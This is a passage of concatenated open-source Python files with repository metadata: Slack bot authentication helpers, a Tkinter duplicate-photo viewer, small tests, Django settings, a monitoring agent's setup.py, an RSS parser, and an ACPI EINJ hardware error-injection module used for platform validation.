return introduce_readable_name
def get_slack_request_type(params_from_slack):
""" Supported requests from Slack are "Slash Command" and "Outgoing Webhook" . Which is this?
:param params_from_slack:
:return:
"""
if 'command' in params_from_slack:
return SLASHCOMMAND
elif 'trigger_word' in params_from_slack:
return WEBHOOK
else:
raise ValueError("Invalid call (params did not not match Slack API).")
#=============================#
# Validators & authentication #
#=============================#
#TODO(hangtwenty) refactor into its own module, but I think I want to get a handle on better config/env/secrets
# stuff first; and before *THAT* I might convert this to use Flask/Zappa ...
def get_slack_request_type_and_authenticate(params_from_slack):
request_type = get_slack_request_type(params_from_slack)
_authenticate(request_type, params_from_slack['token'])
def _validate_input_from_slack_or_die(params_from_slack):
""" Just because it seems "right," fully validate the request params from Slack expected.
Because input validation is a good idea ... validate the param keys in the Slack call.
- https://api.slack.com/getting-started
- https://api.slack.com/outgoing-webhooks
- https://api.slack.com/slash-commands
:param params_from_slack: Parsed parameters POST'd by Slack. These will be the same
params whether the POST comes from an "Outgoing Webhook" or a "Slash Command" integration.
:raise: ValueError
"""
for key in SLACK_CALL_EXPECTED_KEYS_COMMON:
if key not in params_from_slack:
raise ValueError(
"Invalid call (params did not not match Slack API). Expected key {!r} to be in "
"params incoming from Slack call.".format(key))
def _authenticate(slack_request_type, token):
""" Authenticate an incoming `token` against a privileged token.
Tokens allowed are set by configuration.
:param token: The `token` parameter from the incoming request. This must equal
one of the two configured tokens for "Outgoing Webhook" or "Slash Command"
:raise: ValueError
"""
authed = False
if slack_request_type == WEBHOOK:
if SLACK_SLASHCOMMAND_TOKEN:
expected_token = AUTH_TOKENS_EXPECTED_BY_REQUEST_TYPE[WEBHOOK]
if expected_token and token == expected_token:
authed = True
elif slack_request_type == SLASHCOMMAND:
expected_token = AUTH_TOKENS_EXPECTED_BY_REQUEST_TYPE[SLASHCOMMAND]
if expected_token and token == expected_token:
authed = True
if not authed:
raise ValueError("Forbidden.")
return authed
@memoize
def _validate_config_or_die():
""" Die if any essential configuration is not set. (If it's None or 0.)
:raise: ValueError
"""
if not BOT_USER_TOKEN:
raise ValueError("Need a token for the bot user in order to make API calls to Slack.")
if not BOT_USER_NAME:
raise ValueError("You should set a bot username.")
if not SLACK_WEBHOOK_TOKEN and not SLACK_SLASHCOMMAND_TOKEN:
# TODO(hangtwenty) clean up this verbose error message; move this "dev-only" suggestion
# to README.
raise ValueError("Need at least one of the two from-Slack auth tokens to be configured, "
"in order to _authenticate the caller. ")
return True
def _sanitize(output_that_end_user_might_see):
for sensitive_string in SENSITIVE_TOKENS_TO_SANITIZE:
output_that_end_user_might_see = output_that_end_user_might_see.replace(sensitive_string,
'<redacted>')
# double check...
for sensitive_string in SENSITIVE_TOKENS_TO_SANITIZE:
        assert sensitive_string not in output_that_end_user_might_see
return output_that_end_user_might_see
def _get_debug_message(params_from_slack):
"""
:param params_from_slack: params from slack. (FORMPARAMS field.) What Slack POSTs.
:return: Event, formatted nicely for adding into Slack message,
also with any known-sensitive auth tokens removed
"""
dumped = json.dumps(params_from_slack, indent=2)
sanitized = _sanitize(dumped)
debug_msg = u"```\n[DEBUG]\nparams_from_slack = {}\n```\n".format(sanitized)
return debug_msg
|
hangtwenty/yobot
|
yobot/slack_logic.py
|
Python
|
bsd-3-clause
| 12,877
|
import sys, Tkinter, tkFont, ttk
sys.path.insert(0, "./src/")
import button, database
from config import *
# Note: need to set size for bg_canvas here; otherwise it will grow, disregarding the size set when it was created!
def AuxscrollFunction(event):
bg_canvas.configure(scrollregion=bg_canvas.bbox("all"), height=THUMB_HEIGHT)
# create root
root = Tkinter.Tk()
root.geometry(str(WINDOW_WIDTH)+"x"+str(WINDOW_HEIGHT)+"+100+100")
root.minsize(width=WINDOW_WIDTH, height=WINDOW_HEIGHT)
root.title("Find Duplicated Photos")
Tkinter.Grid.columnconfigure(root, 0, weight=0)
Tkinter.Grid.columnconfigure(root, 1, weight=0)
Tkinter.Grid.columnconfigure(root, 2, weight=int(DISPLAY_WIDTH/INFO_WIDTH))
Tkinter.Grid.columnconfigure(root, 3, weight=0)
Tkinter.Grid.rowconfigure(root, 0, weight=int(DISPLAY_HEIGHT/THUMB_HEIGHT))
Tkinter.Grid.rowconfigure(root, 1, weight=0)
Tkinter.Grid.rowconfigure(root, 2, weight=0)
# create frame for displaying selected photo
display_photo_frame = Tkinter.Frame(root, height=DISPLAY_HEIGHT, width=DISPLAY_WIDTH)
display_photo_frame.grid(row=0, column=0, columnspan=3)
# create frame for displaying file info
display_photo_info_frame = Tkinter.Frame(root, height=DISPLAY_HEIGHT, width=INFO_WIDTH, background="white")
display_photo_info_frame.grid(row=0, column=3, sticky=Tkinter.E+Tkinter.W+Tkinter.N+Tkinter.S)
display_photo_info_frame.pack_propagate(False) # by default the frame will shrink to whatever is inside of it
# create background for scroll bar
bg_frame = Tkinter.Frame(root, height=THUMB_HEIGHT)
bg_frame.grid(row=1, column=0, columnspan=4, sticky=Tkinter.E+Tkinter.W+Tkinter.N+Tkinter.S)
bg_canvas = Tkinter.Canvas(bg_frame, background='white')
xscrollbar = Tkinter.Scrollbar(bg_frame, orient="horizontal", command=bg_canvas.xview)
xscrollbar.pack(side=Tkinter.BOTTOM, fill="x")
xscrollbar.grid_forget()
bg_canvas.configure(xscrollcommand=xscrollbar.set)
bg_canvas.pack(fill=Tkinter.BOTH, expand=True, pady=5)
# create frame for duplicated photo batch display
batch_photo_frame = Tkinter.Frame(bg_canvas, height=THUMB_HEIGHT, background='white')
bg_canvas.create_window((0,0),window=batch_photo_frame,anchor='nw')
batch_photo_frame.bind("<Configure>", AuxscrollFunction)
# Note: don't pack batch_photo_frame here, otherwise scroll bar won't show!!!
# create photo database and loading progress bar
progress_bar = ttk.Progressbar(root, orient=Tkinter.HORIZONTAL, length=PROGRESS_BAR_LENGTH, mode='determinate')
progress_bar.grid(row=2, column=2, columnspan=2, sticky=Tkinter.E+Tkinter.W, padx=10)
db = database.Database(progress_bar)
# create buttons
#button_cfg = button.ConfigButton(root, db, 2, 3)
button_next = button.NextBatchButton(root, batch_photo_frame, display_photo_frame, display_photo_info_frame, db, 2, 1)
button_open = button.OpenFolderButton(root, batch_photo_frame, db, button_next, 2, 0)
root.mainloop()
|
ybdarrenwang/DuplicatedPhotoFinder
|
main.py
|
Python
|
bsd-3-clause
| 2,866
|
# coding=utf-8
import numpy as np
import bs
t = bs.common_types.table ()
n_rows = 10
n_cols = 5
t.init (n_rows, n_cols);
for i in xrange (n_cols):
t.set_col_name (i, "Col " + str (i))
a = np.linspace (float (i), float (i + 1), n_rows)
t.set_col_values (i, a)
print t
|
bs-eagle/bs-eagle
|
common_types/python/table_test.py
|
Python
|
bsd-3-clause
| 279
|
from microscopes.mixture.definition import model_definition
from microscopes.models import bb, niw
from nose.tools import (
assert_equals,
assert_is_not,
)
import pickle
import copy
def test_model_definition_pickle():
defn = model_definition(10, [bb, niw(3)])
bstr = pickle.dumps(defn)
defn1 = pickle.loads(bstr)
assert_equals(defn.n(), defn1.n())
assert_equals(len(defn.models()), len(defn1.models()))
for a, b in zip(defn.models(), defn1.models()):
assert_equals(a.name(), b.name())
def test_model_definition_copy():
defn = model_definition(10, [bb, niw(3)])
defn_shallow = copy.copy(defn)
defn_deep = copy.deepcopy(defn)
assert_is_not(defn, defn_shallow)
assert_is_not(defn, defn_deep)
assert_is_not(defn._models, defn_deep._models)
assert_equals(defn.n(), defn_shallow.n())
assert_equals(defn.n(), defn_deep.n())
|
datamicroscopes/mixturemodel
|
test/test_definition.py
|
Python
|
bsd-3-clause
| 893
|
from django.apps import AppConfig
class UsersConfig(AppConfig):
name = 'users'
verbose_name = "Usuarios"
|
flipjack/tecnoservicio
|
tecnoservicio/ordenes/apps.py
|
Python
|
bsd-3-clause
| 113
|
SECRET_KEY = 'not-anymore'
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = False
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
}
}
INSTALLED_APPS = [
'reverse_unique',
'reverse_unique_tests',
]
|
akaariai/django-reverse-unique
|
reverse_unique_tests/settings.py
|
Python
|
bsd-3-clause
| 277
|
#!/usr/bin/env python
"""
Hiveary
https://hiveary.com
Licensed under Simplified BSD License (see LICENSE)
(C) Hiveary, Inc. 2013-2014 all rights reserved
"""
import platform
import sys
from hiveary import __version__ as version
current_platform = platform.system()
FROZEN_NAME = 'hiveary-agent'
AUTHOR = "Hiveary"
AUTHOR_EMAIL = "info@hiveary.com"
DESCRIPTION = "Hiveary Monitoring Agent"
LICENSE = "Simplified BSD"
URL = "http://hiveary.com"
# OS-specific setup
if 'bdist_esky' in sys.argv and current_platform == 'Windows':
# Use esky/cxfreeze to build the agent and py2exe to build the service
from esky.bdist_esky import Executable
from glob import glob
import os
import py2exe # noqa
import setuptools
import shutil
modules = [
'kombu.transport.pyamqp',
'kombu.transport.base',
'kombu.transport.amqplib',
]
sys.path.append('C:\\Program Files (x86)\\Microsoft Visual Studio 9.0\\VC\\redist\\x86\\Microsoft.VC90.CRT')
# Add in Visual Studio C++ compiler library
data_files = [
('Microsoft.VC90.CRT', glob(r'C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\redist\x86\Microsoft.VC90.CRT\*.*')),
r'hiveary\ca-bundle.pem',
('monitors', glob(r'monitors\*.py'))
]
script = Executable('hiveary-agent', gui_only=False)
options = {
'bdist_esky': {
'freezer_module': 'cxfreeze',
'includes': modules,
}
}
# Build the agent
setuptools.setup(name=FROZEN_NAME,
version=version,
scripts=[script],
options=options,
data_files=data_files,
)
sys.argv.remove('bdist_esky')
sys.argv.append('py2exe')
# used for the versioninfo resource
class Target(object):
def __init__(self, **kw):
self.__dict__.update(kw)
self.version = version
self.company_name = 'Hiveary'
self.name = "HivearyService"
script = Target(
description='Hiveary Agent Service Launcher',
modules=["HivearyService"],
cmdline_style='pywin32')
data_files = []
# Build the service
setuptools.setup(name='HivearyService',
version=version,
options={'py2exe': {}},
service=[script]
)
# python27.dll will be available at the root once the esky zip is extracted,
# so we can remove it now
os.remove(r'dist\python27.dll')
shutil.rmtree('build')
else:
try:
from setuptools import setup, find_packages
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
# Include all files from the package.
install_requires = [
'amqplib>=1.0.2',
'kombu>=3.0.8',
'netifaces-merged>=0.9.0',
'oauth2>=1.5.211',
'psutil>=1.1.0',
'simplejson>=3.0.5',
'Twisted>=13.2.0',
'impala>=0.1.1',
]
data_files = [
('/etc/hiveary', ['hiveary.conf.example', 'README.md']),
('/etc/hiveary/init', ['initd/hiveary-agent']),
('/etc/hiveary/systemd', ['arch/hiveary-agent.service']),
('/usr/lib/hiveary', ['monitors/resources.py']),
]
setup(name=FROZEN_NAME,
version=version,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
description=DESCRIPTION,
license=LICENSE,
url=URL,
include_package_data=True,
data_files=data_files,
install_requires=install_requires,
packages=find_packages(),
scripts=['hiveary-agent']
)
|
hiveary/hiveary-agent
|
setup.py
|
Python
|
bsd-3-clause
| 3,550
|
def extractToomtummootstranslationsWordpressCom(item):
'''
Parser for 'toomtummootstranslations.wordpress.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
fake-name/ReadableWebProxy
|
WebMirror/management/rss_parser_funcs/feed_parse_extractToomtummootstranslationsWordpressCom.py
|
Python
|
bsd-3-clause
| 588
|
# Copyright (c) 2015, Intel Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Error Injection EINJ module."""
from __future__ import print_function
import acpi
import bits
import contextlib
from cpudetect import cpulib
import ctypes
import functools
import ttypager
# Create constants for each value in these dictionaries for readability. These
# names are too generic to put in the acpi module's namespace, but they make
# sense in the einj module.
globals().update(map(reversed, acpi._error_injection_action.iteritems()))
globals().update(map(reversed, acpi._error_injection_instruction.iteritems()))
read_mem = {
1: bits.readb,
2: bits.readw,
3: bits.readl,
4: bits.readq,
}
write_mem = {
1: bits.writeb,
2: bits.writew,
3: bits.writel,
4: bits.writeq,
}
out_port = {
1: bits.outb,
2: bits.outw,
3: bits.outl,
}
error_injection_command_status = {
0x0: 'SUCCESS',
0x1: 'UNKNOWN_FAILURE',
0x2: 'INVALID_ACCESS',
}
globals().update(map(reversed, error_injection_command_status.iteritems()))
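# The globals().update(map(reversed, ...)) calls above turn a value->name mapping
# into module-level name->value constants. A self-contained sketch of the same
# trick (hypothetical dictionary, not part of the acpi module):
#
#   _status = {0x0: 'SUCCESS', 0x1: 'UNKNOWN_FAILURE'}
#   globals().update(map(reversed, _status.iteritems()))
#   assert SUCCESS == 0x0 and UNKNOWN_FAILURE == 0x1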
# List of actions that can be executed with no custom processing
_action_simple = [
BEGIN_INJECTION_OPERATION,
END_OPERATION,
EXECUTE_OPERATION,
CHECK_BUSY_STATUS,
GET_COMMAND_STATUS,
]
def _execute_action(entry, value=None):
print("entry.injection_action = {:#x} ({})".format(entry.injection_action, acpi._error_injection_action.get(entry.injection_action, "Unknown")))
if entry.injection_action in _action_simple:
return _execute_instruction(entry)
elif entry.injection_action == GET_TRIGGER_ERROR_ACTION_TABLE:
return acpi.trigger_error_action(_execute_instruction(entry))
elif entry.injection_action == SET_ERROR_TYPE:
if value is None:
raise ValueError("action SET_ERROR_TYPE but no input parameter provided")
return _execute_instruction(entry, value.data)
elif entry.injection_action == GET_ERROR_TYPE:
_execute_instruction(entry)
return acpi.error_type_flags.from_address(entry.register_region.address)
elif entry.injection_action == SET_ERROR_TYPE_WITH_ADDRESS:
if value is None:
raise ValueError("action SET_ERROR_TYPE_WITH_ADDRESS but no input paramters provided")
error_type = value[0]
if error_type.processor_correctable or error_type.processor_uncorrectable_non_fatal or error_type.processor_uncorrectable_fatal:
error_type, flags, apicid = value
cpu_error = acpi.set_error_type_with_addr.from_address(entry.register_region.address)
if cpu_error.error_type.vendor_defined and cpu_error.vendor_error_type_extension_structure_offset:
vendor_err_addr = entry.register_region.address + cpu_error.vendor_error_type_extension_structure_offset
vendor_error_type_extension = acpi.set_error_type_with_addr.from_address(vendor_err_addr)
print(vendor_error_type_extension)
print('WRITE_REGISTER SET_ERROR_TYPE_WITH_ADDRESS address - {0:#x}'.format(entry.register_region.address))
cpu_error.error_type = error_type
cpu_error.flags = flags
cpu_error.apicid = apicid
print(cpu_error)
elif error_type.memory_correctable or error_type.memory_uncorrectable_non_fatal or error_type.memory_uncorrectable_fatal:
error_type, flags, mem_addr, mem_addr_range = value
mem_error = acpi.set_error_type_with_addr.from_address(entry.register_region.address)
print('WRITE_REGISTER SET_ERROR_TYPE_WITH_ADDRESS address - {0:#x}'.format(entry.register_region.address))
mem_error.error_type = error_type
mem_error.flags = flags
mem_error.memory_address = mem_addr
mem_error.memory_address_range = mem_addr_range
print(mem_error)
elif error_type.pci_express_correctable or error_type.pci_express_uncorrectable_non_fatal or error_type.pci_express_uncorrectable_fatal:
error_type, flags, segment, bus, device, function = value
pcie_error = acpi.set_error_type_with_addr.from_address(entry.register_region.address)
print('WRITE_REGISTER SET_ERROR_TYPE_WITH_ADDRESS address - {0:#x}'.format(entry.register_region.address))
pcie_error.error_type = error_type
pcie_error.flags = flags
pcie_error.pcie_sbdf.bits.function_num = function
pcie_error.pcie_sbdf.bits.device_num = device
pcie_error.pcie_sbdf.bits.bus_num = bus
pcie_error.pcie_sbdf.bits.pcie_segment = segment
print(pcie_error)
else:
raise ValueError("action SET_ERROR_TYPE_WITH_ADDRESS has unsupported error_type {}".format(error_type))
elif entry.injection_action == TRIGGER_ERROR:
# Execute the actions specified in the trigger action table.
trigger_table = get_trigger_action_table_op()
for entry in trigger_table.entries:
_execute_instruction(entry)
else:
raise ValueError("action is unsupported")
def _execute_instruction(entry, value=None):
print("entry.instruction = {:#x} ({})".format(entry.instruction, acpi._error_injection_instruction.get(entry.instruction, "Unknown")))
    if entry.instruction == READ_REGISTER:
        return _read_register(entry)
    elif entry.instruction == READ_REGISTER_VALUE:
        return _read_register_value(entry)
    elif entry.instruction == WRITE_REGISTER_VALUE:
        return _write_register(entry)
    elif entry.instruction == WRITE_REGISTER:
        return _write_register(entry, value)
    elif entry.instruction == NOOP:
        return None
def _read_register(entry):
if entry.register_region.address_space_id == acpi.ASID_SYSTEM_MEMORY:
print('READ_REGISTER address - {:#x}'.format(entry.register_region.address))
value = read_mem[entry.register_region.access_size](entry.register_region.address)
value = value >> entry.register_region.register_bit_offset
value = value & entry.mask
print('READ_REGISTER value - {:#x}'.format(value))
return value
return None
def _read_register_value(entry):
read_value = _read_register(entry)
read_value = read_value >> entry.register_region.register_bit_offset
read_value = read_value & entry.mask
print('entry.value - {:#x}'.format(entry.value))
return read_value == entry.value
def _write_register(entry, value=None):
    if value is None:
value = entry.value
if entry.register_region.address_space_id == acpi.ASID_SYSTEM_MEMORY:
print('WRITE_REGISTER address - {:#x}'.format(entry.register_region.address))
read_value = read_mem[entry.register_region.access_size](entry.register_region.address)
print('WRITE_REGISTER before value - {:#x}'.format(read_value))
if entry.flags.bits.preserve_register:
read_value = read_value & ~(entry.mask << entry.register_region.register_bit_offset)
value = value | read_value
write_mem[entry.register_region.access_size](entry.register_region.address, value)
read_value = read_mem[entry.register_region.access_size](entry.register_region.address)
print('WRITE_REGISTER after value - {:#x}'.format(read_value))
elif entry.register_region.address_space_id == acpi.ASID_SYSTEM_IO:
print('WRITE_REGISTER_VALUE IO address - {:#x}'.format(entry.register_region.address))
print('WRITE_REGISTER_VALUE value to write - {:#x}'.format(entry.value))
out_port[entry.register_region.access_size](entry.register_region.address, value)
else:
raise ValueError("Unsupported address_space_id: {}".format(entry.register_region.address_space_id))
def _write_register_value(entry, value):
_write_register(entry, value)
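# Illustrative helper (not called by the EINJ flow above): the read-modify-write
# that _write_register performs when flags.bits.preserve_register is set, shown
# with plain integers so the bit arithmetic is easy to follow.
def _example_preserve_register_merge(old_value, field_value, bit_offset, mask):
    """Return old_value with the masked field at bit_offset replaced by field_value."""
    return (old_value & ~(mask << bit_offset)) | ((field_value & mask) << bit_offset)
# e.g. _example_preserve_register_merge(0xffff, 0x3, 4, 0xf) == 0xff3f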
def get_action(action):
einj = acpi.parse_einj()
if einj is None:
raise RuntimeError("No ACPI EINJ table found")
for entry in einj.entries:
if entry.injection_action == action:
return entry
def get_and_execute_op(action, value=None):
entry = get_action(action)
if entry is None:
        print('Error: action {:#x} ({}) not found in EINJ table'.format(action, acpi._error_injection_action.get(action, "Unknown")))
return
return _execute_action(entry, value)
def begin_inject_op():
return get_and_execute_op(BEGIN_INJECTION_OPERATION)
def get_trigger_action_table_op():
return get_and_execute_op(GET_TRIGGER_ERROR_ACTION_TABLE)
def set_error_type_op(error_type):
return get_and_execute_op(SET_ERROR_TYPE, error_type)
def get_error_type_op():
return get_and_execute_op(GET_ERROR_TYPE)
def end_inject_op():
return get_and_execute_op(END_OPERATION)
def execute_inject_op():
return get_and_execute_op(EXECUTE_OPERATION)
def _execute_trigger_error_op():
    # Create a Trigger Error action to execute
entry = acpi.InjectionInstructionEntry()
entry.injection_action = TRIGGER_ERROR
return _execute_action(entry)
def check_busy_status_op():
busy_status = get_and_execute_op(CHECK_BUSY_STATUS)
print('busy_status = {}'.format('Busy' if busy_status else 'Not Busy'))
return busy_status
def get_cmd_status_op():
cmd_status = get_and_execute_op(GET_COMMAND_STATUS)
print('cmd_status = {:#x} ({})'.format(cmd_status, error_injection_command_status.get(cmd_status, 'Unknown')))
return cmd_status
# This routine is specific to setting a memory error
def _set_error_type_with_addr_op_mem(error_type, flags, mem_addr=None, mem_addr_range=None):
return get_and_execute_op(SET_ERROR_TYPE_WITH_ADDRESS, (error_type, flags, mem_addr, mem_addr_range))
# This routine is specific to setting a processor error
def _set_error_type_with_addr_op_cpu(error_type, flags, apicid=None):
return get_and_execute_op(SET_ERROR_TYPE_WITH_ADDRESS, (error_type, flags, apicid))
# This routine is specific to setting a PCIE error
def _set_error_type_with_addr_op_pcie(error_type, flags, segment=None, bus=None, device=None, function=None):
    return get_and_execute_op(SET_ERROR_TYPE_WITH_ADDRESS, (error_type, flags, segment, bus, device, function))
def einj_cpu_init():
"""Return the error injection cpu init method.
Returns the cpu-specific method if available, otherwise default.
Computed on first call, and cached for subsequent return."""
global einj_cpu_init
@contextlib.contextmanager
def default_cpu_init():
yield
try:
local_einj_cpu_init = cpulib.quirk_einj_cpu_init
print("QUIRK: Setting processor-specific error injection init")
except AttributeError:
local_einj_cpu_init = default_cpu_init
old_func = einj_cpu_init
def einj_cpu_init():
return local_einj_cpu_init()
functools.update_wrapper(einj_cpu_init, old_func)
return local_einj_cpu_init()
@contextlib.contextmanager
def _error_injection_op():
with einj_cpu_init():
begin_inject_op()
yield
execute_inject_op()
while check_busy_status_op():
continue
cmd_status = get_cmd_status_op()
if cmd_status != SUCCESS:
return
_execute_trigger_error_op()
end_inject_op()
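# Minimal sketch of the same sequence without the context managers, for readers
# following the EINJ flow step by step. It assumes the platform supports plain
# SET_ERROR_TYPE and injects a memory correctable error; it is defined for
# illustration only and never called from this module.
def _example_manual_injection_sequence():
    begin_inject_op()
    error_type = acpi.error_type_flags()
    error_type.memory_correctable = 1
    set_error_type_op(error_type)
    execute_inject_op()
    while check_busy_status_op():
        continue
    if get_cmd_status_op() == SUCCESS:
        _execute_trigger_error_op()
    end_inject_op()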
@contextlib.contextmanager
def _inject_memory_error(address=None, mask=None):
# Constructor creates a structure with all zero init
error_type = acpi.error_type_flags()
yield error_type
if (address is not None) and (mask is not None):
# Constructor creates a structure with all zero init
flags = acpi.set_error_type_with_addr_flags()
flags.memory_addr_and_mask_valid = 1
_set_error_type_with_addr_op_mem(error_type, flags, address, mask)
else:
set_error_type_op(error_type)
def inject_memory_correctable_err(address=None, mask=None):
""" Inject memory correctable error.
If address and mask are provided, then SET_ERROR_TYPE_WITH_ADDRESS
Error Injection Action is used. Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().memory_correctable == 0:
print('Memory Correctable error injection is not supported')
return
with _error_injection_op():
with _inject_memory_error(address, mask) as error_type:
error_type.memory_correctable = 1
def inject_memory_unc_nonfatal_err(address=None, mask=None):
"""Inject memory uncorrectable non-fatal error.
If address and mask are provided, then SET_ERROR_TYPE_WITH_ADDRESS
Error Injection Action is used. Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().memory_uncorrectable_non_fatal == 0:
print('Memory Uncorrectable non-Fatal error injection is not supported')
return
with _error_injection_op():
with _inject_memory_error(address, mask) as error_type:
error_type.memory_uncorrectable_non_fatal = 1
def inject_memory_unc_fatal_err(address=None, mask=None):
"""Inject memory uncorrectable fatal error.
If address and mask are provided, then SET_ERROR_TYPE_WITH_ADDRESS
Error Injection Action is used. Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().memory_uncorrectable_fatal == 0:
print('Memory Uncorrectable Fatal error injection is not supported')
return
with _error_injection_op():
with _inject_memory_error(address, mask) as error_type:
error_type.memory_uncorrectable_fatal = 1
@contextlib.contextmanager
def _inject_processor_error(apicid=None):
# Constructor creates a structure with all zero init
error_type = acpi.error_type_flags()
yield error_type
if apicid is not None:
# Constructor creates a structure with all zero init
flags = acpi.set_error_type_with_addr_flags()
flags.processor_apic_valid = 1
_set_error_type_with_addr_op_cpu(error_type, flags, apicid)
else:
set_error_type_op(error_type)
def inject_processor_correctable_err(apicid=None):
""" Inject processor correctable error.
If apicid is provided, then SET_ERROR_TYPE_WITH_ADDRESS Error
Injection Action is used. Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().processor_correctable == 0:
print('Processor Correctable error injection is not supported')
return
with _error_injection_op():
with _inject_processor_error(apicid) as error_type:
error_type.processor_correctable = 1
def inject_processor_unc_nonfatal_err(apicid=None):
"""Inject processor uncorrectable non-fatal error.
If apicid is provided, then SET_ERROR_TYPE_WITH_ADDRESS Error
Injection Action is used. Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().processor_uncorrectable_non_fatal == 0:
print('Processor Uncorrectable non-Fatal error injection is not supported')
return
with _error_injection_op():
with _inject_processor_error(apicid) as error_type:
error_type.processor_uncorrectable_non_fatal = 1
def inject_processor_unc_fatal_err(apicid=None):
    """Inject processor uncorrectable fatal error.
If apicid is provided, then SET_ERROR_TYPE_WITH_ADDRESS Error
Injection Action is used. Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().processor_uncorrectable_fatal == 0:
print('Processor Uncorrectable Fatal error injection is not supported')
return
with _error_injection_op():
with _inject_processor_error(apicid) as error_type:
error_type.processor_uncorrectable_fatal = 1
@contextlib.contextmanager
def _inject_pcie_error(segment=None, bus=None, device=None, function=None):
# Constructor creates a structure with all zero init
error_type = acpi.error_type_flags()
yield error_type
if all(x is not None for x in (segment, bus, device, function)):
# Constructor creates a structure with all zero init
flags = acpi.set_error_type_with_addr_flags()
flags.pcie_sbdf_valid = 1
_set_error_type_with_addr_op_pcie(error_type, flags, segment, bus, device, function)
else:
set_error_type_op(error_type)
def inject_pcie_correctable_err(segment=None, bus=None, device=None, function=None):
""" Inject PCIE correctable error.
If segment, bus, device and function are provided, then
SET_ERROR_TYPE_WITH_ADDRESS Error Injection Action is used.
Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().pci_express_correctable == 0:
print('PCI Express Correctable error injection is not supported')
return
with _error_injection_op():
        with _inject_pcie_error(segment, bus, device, function) as error_type:
            error_type.pci_express_correctable = 1
def inject_pcie_unc_nonfatal_err(segment=None, bus=None, device=None, function=None):
"""Inject PCIE uncorrectable non-fatal error.
If segment, bus, device and function are provided, then
SET_ERROR_TYPE_WITH_ADDRESS Error Injection Action is used.
Otherwise, SET_ERROR_TYPE is used."""
    if get_error_type_op().pci_express_uncorrectable_non_fatal == 0:
        print('PCI Express Uncorrectable non-Fatal error injection is not supported')
        return
    with _error_injection_op():
        with _inject_pcie_error(segment, bus, device, function) as error_type:
            error_type.pci_express_uncorrectable_non_fatal = 1
def inject_pcie_unc_fatal_err(segment=None, bus=None, device=None, function=None):
"""Inject PCIE uncorrectable fatal error.
If segment, bus, device and function are provided, then
SET_ERROR_TYPE_WITH_ADDRESS Error Injection Action is used.
Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().pci_express_uncorrectable_fatal == 0:
print('PCIE Uncorrectable Fatal error injection is not supported')
return
with _error_injection_op():
        with _inject_pcie_error(segment, bus, device, function) as error_type:
            error_type.pci_express_uncorrectable_fatal = 1
@contextlib.contextmanager
def _inject_platform_error():
# Constructor creates a structure with all zero init
error_type = acpi.error_type_flags()
yield error_type
set_error_type_op(error_type)
def inject_platform_correctable_err():
""" Inject platform correctable error."""
if get_error_type_op().platform_correctable == 0:
print('Platform Correctable error injection is not supported')
return
with _error_injection_op():
with _inject_platform_error() as error_type:
error_type.platform_correctable = 1
def inject_platform_unc_nonfatal_err():
"""Inject platform uncorrectable non-fatal error."""
if get_error_type_op().platform_uncorrectable_non_fatal == 0:
print('Platform Uncorrectable non-Fatal error injection is not supported')
return
with _error_injection_op():
with _inject_platform_error() as error_type:
error_type.platform_uncorrectable_non_fatal = 1
def inject_platform_unc_fatal_err():
"""Inject platform uncorrectable fatal error."""
if get_error_type_op().platform_uncorrectable_fatal == 0:
print('Platform Uncorrectable Fatal error injection is not supported')
return
with _error_injection_op():
with _inject_platform_error() as error_type:
error_type.platform_uncorrectable_fatal = 1
def display_einj_address():
address = acpi.get_table_addr("EINJ", 0)
if address is not None:
print('EINJ address {0:#x}'.format(address))
def display_supported_errors():
print(get_error_type_op())
def display_triggers():
with ttypager.page():
print(get_trigger_action_table_op())
def display_vendor_error_type_extension():
with ttypager.page():
entry = get_action(SET_ERROR_TYPE_WITH_ADDRESS)
set_err = acpi.set_error_type_with_addr.from_address(entry.register_region.address)
vendor_err_addr = entry.register_region.address + set_err.vendor_error_type_extension_structure_offset
vendor_err = acpi.vendor_error_type_extension.from_address(vendor_err_addr)
print(vendor_err)
def display_einj():
with ttypager.page():
einj = acpi.parse_einj()
if einj is None:
